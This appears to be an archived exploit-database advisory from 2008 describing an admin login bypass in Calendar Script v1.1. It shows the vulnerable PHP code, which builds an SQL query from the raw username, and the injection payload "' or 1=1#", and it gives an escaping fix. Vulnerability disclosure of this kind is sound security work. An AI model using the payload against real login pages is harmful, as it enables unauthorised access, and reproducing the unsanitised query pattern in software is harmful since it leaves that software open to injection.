Calendar Script v1.1 Admin Login Bypass Vulnerability

vendor:

Calendar Script

by:

athos

7.5

CVSS

HIGH

Admin Login Bypass

CWE

Product Name: Calendar Script

Affected Version From: v1.1

Affected Version To: v1.1

Patch Exists: YES

Related CWE: N/A

CPE: a:hotscripts:calendar_script_v1.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Calendar Script v1.1 Admin Login Bypass Vulnerability

A vulnerability exists in Calendar Script v1.1 which allows an attacker to bypass the authentication process and gain access to the admin panel. This is due to the application not properly sanitizing user-supplied input to the 'username' parameter when handling the 'login' action. An attacker can exploit this vulnerability by supplying a crafted 'username' parameter value of ' or 1=1#' and any value for the 'password' parameter.

Mitigation:

The application should properly sanitize user-supplied input to the 'username' parameter when handling the 'login' action.

Source

Exploit-DB raw data:

 -----------------------------------------------------
 Calendar Script v1.1 Admin Login Bypass Vulnerability
 -----------------------------------------------------
 by athos - staker[at]hotmail[dot]it
 http://www.hotscripts.com/jump.php?listing_id=71365&jump_type=1

 File Vuln "index.php" (code details)

 ------------------------------------------------------------

 4.  $action = $_POST['action'];
 5.
 6.  switch($action) {
 7.  case 'login':
 8.  // login
 9.  $username = stripslashes(trim($_POST['username']));
 10. $password = sha1(stripslashes(trim($_POST['password'])));
 11.
 12. if(empty($username) || empty($password)) {
 13. // Stop, someone tried entering nothing into here
 14. // Show an error.
 15. $loginMsg = 'You must enter a username and password';
 16. } else {
 17. // The input seems to be ok, check it against the database.
 18. $checkDetails = mysql_query("SELECT id FROM user WHERE username='$username' AND password='$password' LIMIT 1", $conn);

 ------------------------------------------------------------

 Exploit

 http://[host]/[path]/index.php

 (Login) Username: ' or 1=1# & Password: anything

 ------------------------------------------------------------

 Fix: $username = mysql_real_escape_string($_POST['username']);

 Note: works regardless php.ini settings (str0ke =D)
       don't add me on msn messenger

 ------------------------------------------------------------

# milw0rm.com [2008-12-22]